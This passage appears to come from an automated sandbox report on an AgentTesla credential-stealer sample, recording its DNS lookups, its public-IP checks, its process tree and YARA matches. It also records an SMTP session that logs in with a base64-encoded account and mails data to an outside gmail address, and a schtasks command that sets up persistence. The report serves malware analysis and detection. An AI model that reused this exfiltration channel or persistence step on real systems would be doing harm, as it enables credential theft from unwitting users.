                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.789524078 CET8.8.8.8192.168.2.60x2ea1No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:50:57.841023922 CET8.8.8.8192.168.2.60xa8aaNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.724127054 CET8.8.8.8192.168.2.60xe3daNo error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.724127054 CET8.8.8.8192.168.2.60xe3daNo error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.876422882 CET8.8.8.8192.168.2.60xf4baNo error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:19.876422882 CET8.8.8.8192.168.2.60xf4baNo error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.752038956 CET8.8.8.8192.168.2.60x1df9No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:51:46.796346903 CET8.8.8.8192.168.2.60x6660No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:10.964626074 CET8.8.8.8192.168.2.60x1930No error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:52:10.964626074 CET8.8.8.8192.168.2.60x1930No error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false
                                                  Nov 29, 2022 16:52:11.434695959 CET8.8.8.8192.168.2.60xd825No error (0)mail.strictfacilityservices.comstrictfacilityservices.comCNAME (Canonical name)IN (0x0001)false
                                                  Nov 29, 2022 16:52:11.434695959 CET8.8.8.8192.168.2.60xd825No error (0)strictfacilityservices.com111.118.212.38A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • api.ipify.org

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.64971352.20.78.240443C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-11-29 15:50:59 UTC0OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2022-11-29 15:50:59 UTC0INHTTP/1.1 200 OK
                                                  Server: Cowboy
                                                  Connection: close
                                                  Content-Type: text/plain
                                                  Vary: Origin
                                                  Date: Tue, 29 Nov 2022 15:50:59 GMT
                                                  Content-Length: 14
                                                  Via: 1.1 vegur
                                                  2022-11-29 15:50:59 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
                                                  Data Ascii: 102.129.143.49


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.6497203.232.242.170443C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-11-29 15:51:48 UTC0OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  2022-11-29 15:51:48 UTC0INHTTP/1.1 200 OK
                                                  Server: Cowboy
                                                  Connection: close
                                                  Content-Type: text/plain
                                                  Vary: Origin
                                                  Date: Tue, 29 Nov 2022 15:51:48 GMT
                                                  Content-Length: 14
                                                  Via: 1.1 vegur
                                                  2022-11-29 15:51:48 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39
                                                  Data Ascii: 102.129.143.49


                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 29, 2022 16:51:21.977685928 CET58749717111.118.212.38192.168.2.6220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:51:21 +0000
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2022 16:51:21.978070021 CET49717587192.168.2.6111.118.212.38EHLO 302494
                                                  Nov 29, 2022 16:51:22.252252102 CET58749717111.118.212.38192.168.2.6250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2022 16:51:22.253521919 CET49717587192.168.2.6111.118.212.38AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 16:51:22.526686907 CET58749717111.118.212.38192.168.2.6334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 16:51:23.584398985 CET58749717111.118.212.38192.168.2.6235 Authentication succeeded
                                                  Nov 29, 2022 16:51:23.585345030 CET49717587192.168.2.6111.118.212.38MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 16:51:23.860614061 CET58749717111.118.212.38192.168.2.6250 OK
                                                  Nov 29, 2022 16:51:23.860863924 CET49717587192.168.2.6111.118.212.38RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 16:51:24.168071032 CET58749717111.118.212.38192.168.2.6250 Accepted
                                                  Nov 29, 2022 16:51:24.169872999 CET49717587192.168.2.6111.118.212.38DATA
                                                  Nov 29, 2022 16:51:24.443375111 CET58749717111.118.212.38192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 16:51:24.450061083 CET49717587192.168.2.6111.118.212.38.
                                                  Nov 29, 2022 16:51:24.724167109 CET58749717111.118.212.38192.168.2.6250 OK id=1p02tI-0007mJ-Bj
                                                  Nov 29, 2022 16:52:14.190653086 CET58749722111.118.212.38192.168.2.6220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:52:14 +0000
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 29, 2022 16:52:14.194787025 CET49722587192.168.2.6111.118.212.38EHLO 302494
                                                  Nov 29, 2022 16:52:14.473042011 CET58749722111.118.212.38192.168.2.6250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPE_CONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 29, 2022 16:52:14.499712944 CET49722587192.168.2.6111.118.212.38AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
                                                  Nov 29, 2022 16:52:14.778090954 CET58749722111.118.212.38192.168.2.6334 UGFzc3dvcmQ6
                                                  Nov 29, 2022 16:52:17.294580936 CET58749722111.118.212.38192.168.2.6235 Authentication succeeded
                                                  Nov 29, 2022 16:52:17.297631979 CET49722587192.168.2.6111.118.212.38MAIL FROM:<accounts@strictfacilityservices.com>
                                                  Nov 29, 2022 16:52:17.575813055 CET58749722111.118.212.38192.168.2.6250 OK
                                                  Nov 29, 2022 16:52:17.576160908 CET49722587192.168.2.6111.118.212.38RCPT TO:<guc850155@gmail.com>
                                                  Nov 29, 2022 16:52:17.900510073 CET58749722111.118.212.38192.168.2.6250 Accepted
                                                  Nov 29, 2022 16:52:17.901293039 CET49722587192.168.2.6111.118.212.38DATA
                                                  Nov 29, 2022 16:52:18.179738045 CET58749722111.118.212.38192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Nov 29, 2022 16:52:18.188690901 CET49722587192.168.2.6111.118.212.38.
                                                  Nov 29, 2022 16:52:18.467991114 CET58749722111.118.212.38192.168.2.6250 OK id=1p02uA-00087S-33

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:16:50:18
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Imagebase:0x690000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  General

                                                  Target ID:8
                                                  Start time:16:50:43
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:9
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:10
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x370000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:11
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x870000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:12
                                                  Start time:16:50:45
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Imagebase:0x5c0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 32%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:13
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:14
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:15
                                                  Start time:16:51:32
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x2e0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:16
                                                  Start time:16:51:33
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x460000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:12.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:73
                                                    Total number of Limit Nodes:4
                                                    execution_graph 10563 29ebd98 DuplicateHandle 10564 29ebe2e 10563->10564 10565 29e6988 10566 29e699f 10565->10566 10569 29e56e4 10566->10569 10568 29e69b4 10570 29e56ef 10569->10570 10573 29e5978 10570->10573 10572 29e6a8d 10572->10568 10574 29e5983 10573->10574 10577 29e59a8 10574->10577 10576 29e6b62 10576->10572 10578 29e59b3 10577->10578 10581 29e59d8 10578->10581 10580 29e6c62 10580->10576 10582 29e59e3 10581->10582 10584 29e737e 10582->10584 10588 29e9778 10582->10588 10591 29e9767 10582->10591 10583 29e73bc 10583->10580 10584->10583 10595 29eb898 10584->10595 10599 29e9870 10588->10599 10589 29e9787 10589->10584 10592 29e9778 10591->10592 10594 29e9870 2 API calls 10592->10594 10593 29e9787 10593->10584 10594->10593 10596 29eb8c9 10595->10596 10597 29eb8ed 10596->10597 10614 29eba58 10596->10614 10597->10583 10600 29e9883 10599->10600 10601 29e989b 10600->10601 10606 29e9af8 10600->10606 10601->10589 10602 29e9a98 GetModuleHandleW 10604 29e9ac5 10602->10604 10603 29e9893 10603->10601 10603->10602 10604->10589 10607 29e9b0c 10606->10607 10609 29e9b31 10607->10609 10610 29e8e18 10607->10610 10609->10603 10611 29e9cd8 LoadLibraryExW 10610->10611 10613 29e9d51 10611->10613 10613->10609 10615 29eba65 10614->10615 10616 29eba9f 10615->10616 10618 29ea53c 10615->10618 10616->10597 10619 29ea547 10618->10619 10621 29ec798 10619->10621 10622 29ec358 10619->10622 10621->10621 10623 29ec363 10622->10623 10624 29e59d8 2 API calls 10623->10624 10625 29ec807 10624->10625 10629 29ee570 10625->10629 10634 29ee588 10625->10634 10626 29ec840 10626->10621 10631 29ee588 10629->10631 10630 29ee5c5 10630->10626 10631->10630 10640 29ee8d0 10631->10640 10643 29ee8c0 10631->10643 10636 29ee5b9 10634->10636 10637 29ee606 10634->10637 10635 29ee5c5 10635->10626 10636->10635 10638 29ee8d0 2 API calls 10636->10638 10639 29ee8c0 2 API calls 10636->10639 10637->10626 10638->10637 10639->10637 10641 29e9870 LoadLibraryExW GetModuleHandleW 10640->10641 10642 29ee8d9 10641->10642 10642->10630 10644 29e9870 LoadLibraryExW GetModuleHandleW 10643->10644 10645 29ee8d9 10643->10645 10644->10645 10645->10630 10646 29ebb70 GetCurrentProcess 10647 29ebbea GetCurrentThread 10646->10647 10648 29ebbe3 10646->10648 10649 29ebc27 GetCurrentProcess 10647->10649 10650 29ebc20 10647->10650 10648->10647 10653 29ebc5d 10649->10653 10650->10649 10651 29ebc85 GetCurrentThreadId 10652 29ebcb6 10651->10652 10653->10651

                                                    Executed Functions

                                                    Function 029EBB70 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 029EBBD0
                                                    • GetCurrentThread.KERNEL32 ref: 029EBC0D
                                                    • GetCurrentProcess.KERNEL32 ref: 029EBC4A
                                                    • GetCurrentThreadId.KERNEL32 ref: 029EBCA3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 734fb04597738d37029ecdddf4e498725ebbf60ffb7a2766f71056720a133ff6
                                                    • Instruction ID: 360e3a209e4b06fe6deb3059dda4e362bb03459a1ee4395df642666dd2278aa5
                                                    • Opcode Fuzzy Hash: 734fb04597738d37029ecdddf4e498725ebbf60ffb7a2766f71056720a133ff6
                                                    • Instruction Fuzzy Hash: 045134B09043488FDB14CFA9D688B9EBBF4FB48318F24845DE40AB7250DB74A845CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029E9870 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 125 29e9870-29e9885 call 29e8db0 128 29e989b-29e989f 125->128 129 29e9887-29e9895 call 29e9af8 125->129 130 29e98b3-29e98f4 128->130 131 29e98a1-29e98ab 128->131 129->128 133 29e99d0-29e9a48 129->133 136 29e98f6-29e98fe 130->136 137 29e9901-29e990f 130->137 131->130 173 29e9a6a-29e9a90 133->173 174 29e9a4a-29e9a68 133->174 136->137 138 29e9933-29e9935 137->138 139 29e9911-29e9916 137->139 143 29e9938-29e993f 138->143 141 29e9918-29e991f call 29e8dbc 139->141 142 29e9921 139->142 146 29e9923-29e9931 141->146 142->146 147 29e994c-29e9953 143->147 148 29e9941-29e9949 143->148 146->143 150 29e9955-29e995d 147->150 151 29e9960-29e9969 call 29e8dcc 147->151 148->147 150->151 155 29e996b-29e9973 151->155 156 29e9976-29e997b 151->156 155->156 158 29e997d-29e9984 156->158 159 29e9999-29e99a0 call 29e9e00 156->159 158->159 160 29e9986-29e9996 call 29e8ddc call 29e8dec 158->160 163 29e99a3-29e99a6 159->163 160->159 166 29e99a8-29e99c6 163->166 167 29e99c9-29e99cf 163->167 166->167 175 29e9a98-29e9ac3 GetModuleHandleW 173->175 176 29e9a92-29e9a95 173->176 174->173 177 29e9acc-29e9ae0 175->177 178 29e9ac5-29e9acb 175->178 176->175 178->177
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 029E9AB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: a78dc45383a2715310fe2754d0ac030d0f21cd3e60c58c468352a3ca24550538
                                                    • Instruction ID: 9f26b209499835d353795c547d9f5d06924bf4db63a41725d74acd62f432814c
                                                    • Opcode Fuzzy Hash: a78dc45383a2715310fe2754d0ac030d0f21cd3e60c58c468352a3ca24550538
                                                    • Instruction Fuzzy Hash: 5E713370A00B048FEB25DF6AD44079ABBF5BF88314F00892DD48ADBA50DB35E9058F91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029EBD98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 182 29ebd98-29ebe2c DuplicateHandle 183 29ebe2e-29ebe34 182->183 184 29ebe35-29ebe52 182->184 183->184
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029EBE1F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 55ef258fe5a429346eca9566ec3a8762645761324947ebda7a143acfbaf8ff73
                                                    • Instruction ID: 105f1948692bb5d1f5bcb7c2998266eb2410f446276cd6b7c1cd8fc6923f818a
                                                    • Opcode Fuzzy Hash: 55ef258fe5a429346eca9566ec3a8762645761324947ebda7a143acfbaf8ff73
                                                    • Instruction Fuzzy Hash: 5621C2B59002499FDB10CFAAD984AEEFBF8FB48324F14841AE915A7310D374A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029E8E18 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 187 29e8e18-29e9d18 189 29e9d1a-29e9d1d 187->189 190 29e9d20-29e9d4f LoadLibraryExW 187->190 189->190 191 29e9d58-29e9d75 190->191 192 29e9d51-29e9d57 190->192 192->191
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029E9B31,00000800,00000000,00000000), ref: 029E9D42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 84be16bb3b044913b18cccc65baa5aaa58134d9458308f41abefa515211f62a0
                                                    • Instruction ID: fa225a546f666ef661e880a8b01f6f4a6fb276dfc20e5e7ffd0515499151af09
                                                    • Opcode Fuzzy Hash: 84be16bb3b044913b18cccc65baa5aaa58134d9458308f41abefa515211f62a0
                                                    • Instruction Fuzzy Hash: FC1106B29003488FDB10CF9AD444BDEFBF8EB88314F04841EE516A7600C375A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029E9A50 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 195 29e9a50-29e9a90 196 29e9a98-29e9ac3 GetModuleHandleW 195->196 197 29e9a92-29e9a95 195->197 198 29e9acc-29e9ae0 196->198 199 29e9ac5-29e9acb 196->199 197->196 199->198
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 029E9AB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 312aa580fd86340a465555dd9aa3c5800f6d1a5d2a7366c4bd2fc1e526bf443c
                                                    • Instruction ID: a03f1cfc1f06c1fa494f85cf99daefda6f669fc68a97ffe29cb25c228d00d699
                                                    • Opcode Fuzzy Hash: 312aa580fd86340a465555dd9aa3c5800f6d1a5d2a7366c4bd2fc1e526bf443c
                                                    • Instruction Fuzzy Hash: ED11CDB69002498BDB10CF9AD444BDEFBF8AF88228F14841AD41AB7600D375A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E1D4A0 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
